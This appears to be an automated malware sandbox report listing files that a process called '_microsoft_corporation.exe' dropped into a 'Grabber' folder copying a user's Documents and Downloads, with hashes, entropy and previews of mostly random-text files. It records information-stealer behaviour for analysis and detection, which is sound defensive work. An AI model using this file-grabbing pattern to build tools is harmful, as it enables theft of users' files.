SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOU